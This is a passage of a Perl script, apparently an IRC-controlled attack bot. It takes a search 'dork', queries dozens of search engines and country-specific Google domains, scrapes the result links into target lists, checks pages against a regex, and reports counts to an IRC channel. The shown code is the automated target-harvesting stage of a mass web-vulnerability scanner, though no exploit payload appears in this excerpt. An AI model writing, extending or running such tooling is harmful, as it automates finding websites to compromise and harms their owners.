push(@total,@cv); } if ($engine eq "ky") { my @ky = &jack10($dork."+site:ky"); push(@total,@ky); } if ($engine eq "cf") { my @cf = &jack1($dork."+site:cf"); push(@total,@cf); } if ($engine eq "cx") { my @cx = &jack2($dork."+site:cx"); push(@total,@cx); } if ($engine eq "cw") { my @cw = &jack3($dork."+site:cw"); push(@total,@cw); } if ($engine eq "cy") { my @cy = &jack4($dork."+site:cy"); push(@total,@cy); } if ($engine eq "fk") { my @fk = &jack5($dork."+site:fk"); push(@total,@fk); } if ($engine eq "fo") { my @fo = &jack6($dork."+site:fo"); push(@total,@fo); } if ($engine eq "gh") { my @gh = &jack7($dork."+site:gh"); push(@total,@gh); } if ($engine eq "gd") { my @gd = &jack8($dork."+site:gd"); push(@total,@gd); } if ($engine eq "gp") { my @gp = &jack9($dork."+site:gp"); push(@total,@gp); } if ($engine eq "gu") { my @gu = &jack10($dork."+site:gu"); push(@total,@gu); } if ($engine eq "gn") { my @gn = &jack1($dork."+site:gn"); push(@total,@gn); } if ($engine eq "gy") { my @gy = &jack2($dork."+site:gy"); push(@total,@gy); } if ($engine eq "hm") { my @hm = &jack3($dork."+site:hm"); push(@total,@hm); } if ($engine eq "iq") { my @iq = &jack4($dork."+site:ig"); push(@total,@iq); } if ($engine eq "jm") { my @jm = &jack5($dork."+site:jm"); push(@total,@jm); } if ($engine eq "ki") { my @ki = &jack6($dork."+site:ki"); push(@total,@ki); } if ($engine eq "kw") { my @kw = &jack7($dork."+site:kw"); push(@total,@kw); } if ($engine eq "la") { my @la = &jack8($dork."+site:la"); push(@total,@la); } if ($engine eq "lb") { my @lb = &jack9($dork."+site:lb"); push(@total,@lb); } if ($engine eq "lr") { my @lr = &jack10($dork."+site:lr"); push(@total,@lr); } if ($engine eq "mo") { my @mo = &jack1($dork."+site:mo"); push(@total,@mo); } if ($engine eq "mg") { my @mg = &jack2($dork."+site:mg"); push(@total,@mg); } if ($engine eq "mv") { my @mv = &jack3($dork."+site:my"); push(@total,@mv); } if ($engine eq "mp") { my @mp = &jack4($dork."+site:mp"); push(@total,@mp); } if ($engine eq "mq") { my @mq = &jack5($dork."+site:mg"); push(@total,@mq); } if ($engine eq "mr") { my @mr = &jack6($dork."+site:mr"); push(@total,@mr); } if ($engine eq "yt") { my @yt = &jack7($dork."+site:yt"); push(@total,@yt); } if ($engine eq "md") { my @md = &jack8($dork."+site:md"); push(@total,@md); } if ($engine eq "mc") { my @mc = &jack9($dork."+site:mc"); push(@total,@mc); } if ($engine eq "me") { my @me = &jack10($dork."+site:me"); push(@total,@me); } if ($engine eq "mz") { my @mz = &jack1($dork."+site:mz"); push(@total,@mz); } if ($engine eq "nr") { my @nr = &jack2($dork."+site:nr"); push(@total,@nr); } if ($engine eq "nc") { my @nc = &jack3($dork."+site:nc"); push(@total,@nc); } if ($engine eq "ng") { my @ng = &jack4($dork."+site:ng"); push(@total,@ng); } if ($engine eq "nu") { my @nu = &jack5($dork."+site:nu"); push(@total,@nu); } if ($engine eq "pw") { my @pw = &jack6($dork."+site:pw"); push(@total,@pw); } if ($engine eq "ps") { my @ps = &jack7($dork."+site:ps"); push(@total,@ps); } if ($engine eq "cq") { my @cq = &jack8($dork."+site:cg"); push(@total,@cq); } if ($engine eq "re") { my @re = &jack9($dork."+site:re"); push(@total,@re); } if ($engine eq "lc") { my @lc = &jack10($dork."+site:lc"); push(@total,@lc); } if ($engine eq "pm") { my @pm = &jack1($dork."+site:pm"); push(@total,@pm); } if ($engine eq "st") { my @st = &jack2($dork."+site:st"); push(@total,@st); } if ($engine eq "rs") { my @rs = &jack3($dork."+site:rs"); push(@total,@rs); } if ($engine eq "gs") { my @gs = &jack4($dork."+site:gs"); push(@total,@gs); } if ($engine eq "sl") { my @sl = &jack5($dork."+site:sl"); push(@total,@sl); } if ($engine eq "sx") { my @sx = &jack6($dork."+site:sx"); push(@total,@sx); } if ($engine eq "sb") { my @sb = &jack7($dork."+site:sb"); push(@total,@sb); } if ($engine eq "so") { my @so = &jack8($dork."+site:so"); push(@total,@so); } if ($engine eq "su") { my @su = &jack9($dork."+site:su"); push(@total,@su); } if ($engine eq "kn") { my @kn = &jack10($dork."+site:kn"); push(@total,@kn); } if ($engine eq "sr") { my @sr = &jack1($dork."+site:sr"); push(@total,@sr); } if ($engine eq "tz") { my @tz = &jack2($dork."+site:tz"); push(@total,@tz); } if ($engine eq "tl") { my @tl = &jack3($dork."+site:tl"); push(@total,@tl); } if ($engine eq "tg") { my @tg = &jack4($dork."+site:tg"); push(@total,@tg); } if ($engine eq "tk") { my @tk = &jack5($dork."+site:tk"); push(@total,@tk); } if ($engine eq "tn") { my @tn = &jack6($dork."+site:tn"); push(@total,@tn); } if ($engine eq "tc") { my @tc = &jack7($dork."+site:tc"); push(@total,@tc); } if ($engine eq "vu") { my @vu = &jack8($dork."+site:vu"); push(@total,@vu); } if ($engine eq "wf") { my @wf = &jack9($dork."+site:wf"); push(@total,@wf); } if ($engine eq "ws") { my @ws = &jack10($dork."+site:ws"); push(@total,@ws); } if ($engine eq "ye") { my @ye = &jack1($dork."+site:ye"); push(@total,@ye); } if ($engine eq "zw") { my @zw = &jack2($dork."+site:zw"); push(@total,@zw); } if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); } if ($engine eq "WaLLa") { my @walla = &walla($dork,$chan); push(@total,@walla); } if ($engine eq "YaHoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); } if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); } if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); } if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); } if ($engine eq "OnEt") { my @onet = &onet($dork); push(@total,@onet); } if ($engine eq "CLusTy") { my @clusty = &clusty($dork); push(@total,@clusty); } if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); } if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); } if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); } if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); } if ($engine eq "SeZNam") { my @seznam = &seznam($dork); push(@total,@seznam); } if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@biglobe); } if ($engine eq "Yahoo2") { my @yahoo2 = &yahoo2($dork); push(@total,@yahoo2); } if ($engine eq "KvaSiR") { my @kvasir = &kvasir($dork); push(@total,@kvasir); } if ($engine eq "QuinT") { my @quint = &quint($dork); push(@total,@quint); } if ($engine eq "Pagina") { my @pagina = &pagina($dork); push(@total,@pagina); } if ($engine eq "Clix") { my @clix = &clix($dork); push(@total,@clix); } if ($engine eq "ask2") { my @ask2 = &ask2($dork); push(@total,@ask2); } if ($engine eq "webcrawler") { my @webcrawler = &webcrawler($dork); push(@total,@webcrawler); } if ($engine eq "witch") { my @witch = &witch($dork); push(@total,@witch); } if ($engine eq "amidalla") { my @amidalla = &amidalla($dork); push(@total,@amidalla); } if ($engine eq "gibla") { my @gibla = &gibla($dork); push(@total,@gibla); } if ($engine eq "mywebsearch") { my @mywebsearch = &mywebsearch($dork); push(@total,@mywebsearch); } if ($engine eq "dogpile") { my @dogpile = &dogpile($dork); push(@total,@dogpile); } if ($engine eq "infocom") { my @infocom = &infocom($dork); push(@total,@infocom); } if ($engine eq "searchcom") { my @searchcom = &searchcom($dork); push(@total,@searchcom); } if ($engine eq "teoma") { my @teoma = &teoma($dork); push(@total,@teoma); } if ($engine eq "volunia") { my @volunia = &volunia($dork); push(@total,@volunia); } if ($engine eq "izito") { my @izito = &izito($dork); push(@total,@izito); } if ($engine eq "becak") { my @becak = &becak($dork); push(@total,@becak); } if ($engine eq "bokep") { my @bokep = &bokep($dork); push(@total,@bokep); } if ($engine eq "searchnz") { my @searchnz = &searchnz($dork); push(@total,@searchnz); } if ($engine eq "BaiDu") { my @baidu = &baidu($dork); push(@total,@baidu); } @clean = &clean(@total); if ($silentmode == 0) { &msg("$chan","$logo(4$engine14) 4::.12 ".scalar(@total)." 14)4.::"); } return @clean; } ################################################################################## sub isFound() { my $status = 0; my $link = $_[0]; my $reqexp = $_[1]; my $res = &get_content($link); if ($res =~ /$reqexp/) { $status = 1 } return $status; } sub get_content() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout($timot); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content; } ######################################### SEARCH ENGINE sub googleCA() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.ca/search?q=".uri_escape($key)."&hl=&cr=countryCA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCA/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleDE() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.de/search?q=".uri_escape($key)."&hl=&cr=countryDE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleDE/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleUK() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.co.uk/search?q=".uri_escape($key)."&hl=&cr=countryUK&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleUK/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleFR() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.fr/search?q=".uri_escape($key)."&hl=&cr=countryFR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleFR/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleES() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.es/search?q=".uri_escape($key)."&hl=&cr=countryES&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleES/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleIT() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.it/search?q=".uri_escape($key)."&hl=&cr=countryIT&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleIT/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub googleNL() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.nl/search?q=".uri_escape($key)."&hl=&cr=countryNL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleNL/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleBE() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.be/search?q=".uri_escape($key)."&hl=&cr=countryBE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleBE/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleCH() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.ch/search?q=".uri_escape($key)."&hl=&cr=countryCH&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCH/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub googleSE() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.se/search?q=".uri_escape($key)."&hl=&cr=countrySE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleSE/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleDK() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.dk/search?q=".uri_escape($key)."&hl=&cr=countryDK&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleDK/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleNO() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.no/search?q=".uri_escape($key)."&hl=&cr=countryNO&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleNO/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub googleNZ() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.co.nz/search?q=".uri_escape($key)."&hl=&cr=countryNZ&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleNZ/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleIE() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.ie/search?q=".uri_escape($key)."&hl=&cr=countryIE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleIE/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleBR() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.com.br/search?q=".uri_escape($key)."&hl=&cr=countryBR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(2); sub googleAR() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.com.ar/search?q=".uri_escape($key)."&hl=&cr=countryAR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleAR/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleCO() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.com.co/search?q=".uri_escape($key)."&hl=&cr=countryCO&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCO/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleCU() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.com.cu/search?q=".uri_escape($key)."&hl=&cr=countryCU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCU/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(2); sub googleCL() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.cl/search?q=".uri_escape($key)."&hl=&cr=countryCL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCL/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleMX() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.com.mx/search?q=".uri_escape($key)."&hl=&cr=countryMX&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleMX/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleAU() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.com.au/search?q=".uri_escape($key)."&hl=&cr=countryAU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleAU/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(2); sub googleRU() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.com.ru/search?q=".uri_escape($key)."&hl=&cr=countryRU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleRU/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleAT() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.at/search?q=".uri_escape($key)."&hl=&cr=countryAT&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleAT/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googlePL() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.pl/search?q=".uri_escape($key)."&hl=&cr=countryPL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlePL/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(3); sub googleIL() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.co.il/search?q=".uri_escape($key)."&hl=&cr=countryIL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleIL/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleTR() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.com.tr/search?q=".uri_escape($key)."&hl=&cr=countryTR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleTR/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleUA() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.com.ua/search?q=".uri_escape($key)."&hl=&cr=countryUA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleUA/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(3); sub googleGR() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.gr/search?q=".uri_escape($key)."&hl=&cr=countryGR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleGR/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleJP() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.co.jp/search?q=".uri_escape($key)."&hl=&cr=countryJP&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleJP/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleCN() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.com.hk/search?q=".uri_escape($key)."&hl=&cr=countryCN&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCN/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(3); sub googleMY() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.com.my/search?q=".uri_escape($key)."&hl=&cr=countryMY&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleMY/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleTH() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.co.th/search?q=".uri_escape($key)."&hl=&cr=countryTH&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleTH/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleIN() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.co.in/search?q=".uri_escape($key)."&hl=&cr=countryIN&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleIN/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(3); sub googleKR() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.co.kr/search?q=".uri_escape($key)."&hl=&cr=countryKR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleKR/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleRO() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.ro/search?q=".uri_escape($key)."&hl=&cr=countryRO&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleRO/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleTW() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.com.tw/search?q=".uri_escape($key)."&hl=&cr=countryTW&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleTW/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(3); sub googleZA() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.co.za/search?q=".uri_escape($key)."&hl=&cr=countryZA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleZA/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googlePT() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=50){ my $search = ("http://www.google.pt/search?q=".uri_escape($key)."&hl=&cr=countryPT&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlePT/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub becak() { my @list; my $key = $_[0]; my @doms = ("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm","co.kr"); foreach my $domain (@doms) { $dom = $doms[rand(scalar(@doms))]; for ($b=1; $b<=500; $b+=30) { my $search = ("http://www.google.com/search?num=50&q=".uri_escape($key)."&start=".$b."&sa=N"); my $res = search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) { if ($1 !~ /google/){ my $link = $1; my @grep = &links($link); push(@list,@grep); } } } return @list; } } sub bokep() { my @list; my $key = $_[0]; for ($b=0; $b<=500; $b+=50) { my $search = ("http://www.search.xxx/search/?q=".uri_escape($key)."&lr=all&cat=&or=&start=".$b); my $res = search_engine_query($search); while ($res =~ m/<h2 class=\"result-web\">(.*?)<\/h2>/g) { if ($1 !~ /search\.xxx/){ my $link = $1; my @grep = &links($link); push(@list,@grep); } } } return @list; } sub searchnz() { my @list; my $key = $_[0]; for ($b=1; $b<=500; $b+=50) { my $search = ("http://searchnz.co.nz/search.aspx?q=".uri_escape($key)."&gr=false&np=".$b); my $res = search_engine_query($search); while ($res =~ m/>http:\/\/(.+?)<\/a><\/div>/g) { if ($1 !~ /webads\.co\.nz/){ my $link = $1; my @grep = &links($link); push(@list,@grep); } } } return @list; } sub webcrawler() { my @list; my $key = $_[0]; for ($i = 0 ;$i <= 1400 ;$i += 20) { my $clink = ("http://www.webcrawler.com/search/web?qsi=".$i."&q=".uri_escape($key)."&fcop=results-top"); my $re = search_engine_query($clink); while ($re =~ m/nonpaid','(.*)','http:\/\/(.+?)\'/g) { my $link = $1; if ($1 !~ /webcrawler\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub clusty() { my @list; my $key = $_[0]; my $b = 0; for ($b=0; $b<=120; $b+=10) { my $search = ("http://search.yippy.com/search?query=".uri_escape($key)."&input-form=clusty-simple&v:sources=webplus&v:state=root|root-".$b."-10|0&"); my $res = search_engine_query($search); while ($res =~ m/<div class=\"document-header\"><a href=\"http:\/\/(.*?)\"><span class=\"title\">/g) { if ($1 !~ /yippy\.com/){ my $link = $1; my @grep = &links($link); push(@list,@grep); } } } return @list; } sub witch(){ my @list; my $key = $_[0]; for($b=0; $b<=1000; $b+=50){ my $Lyc = ("http://www.witch.de/search-result.php?searchtype=phonetisch&search=".uri_escape($key)."&cn=".$b); my $Res = search_engine_query($Lyc); while ($Res =~ m/<a href=\"http:\/\/(.+?)\"/g){ my $link = $1; if ($1 !~ /witch\.de/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub amidalla(){ my @list; my $key = $_[0]; my $i = 0; for ($i=1; $i<=1000; $i+=50){ my $web=("http://www.amidalla.de/cgi-bin/amisearch.cgi?search=".uri_escape($key)."&page=".$i."&break=10&af=2&tld=com&et=2"); my $Res= search_engine_query($web); while ($Res =~ m/<a href=\"http:\/\/(.+?)\//g){ if ($1 !~ /amidalla/){ my $link = $1; my @grep = &links($link); push(@list,@grep); } } } return @list; } sub gibla() { my @list; my $key = $_[0]; for ($b=0; $b<=600; $b+=40) { my $search = ("http://www.gigablast.com/search?s=".$b."&q=".uri_escape($key)); my $res = search_engine_query($search); while ($res =~ m/<span class=\"url\">(.+?)<\/span>/g) { my $link = $1; if ($link!~ /gigablast/) { my @grep = &links($link); push(@list,@grep); } } } return @list; } sub mywebsearch() { my @list; my $key = $_[0]; for ($b = 1; $b<=700; $b+=40) { my $search = ("http://search.mywebsearch.com/mywebsearch/GGweb.jhtml?searchfor=".uri_escape($key)."&pn=".$b); my $res = search_engine_query($search); while ($res =~ m/<span class=\"uri\">http:\/\/(.+?)\<\/span>/g) { my $link = $1; if ($1 !~ /mywebsearch\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub dogpile() { my @list; my $key = $_[0]; for ($b = 1; $b<=901; $b+=40) { my $search = ("http://www.dogpile.com/info.dogpl/search/web?qsi=".$b."&q=".uri_escape($key)); my $res = search_engine_query($search); while ($res =~ 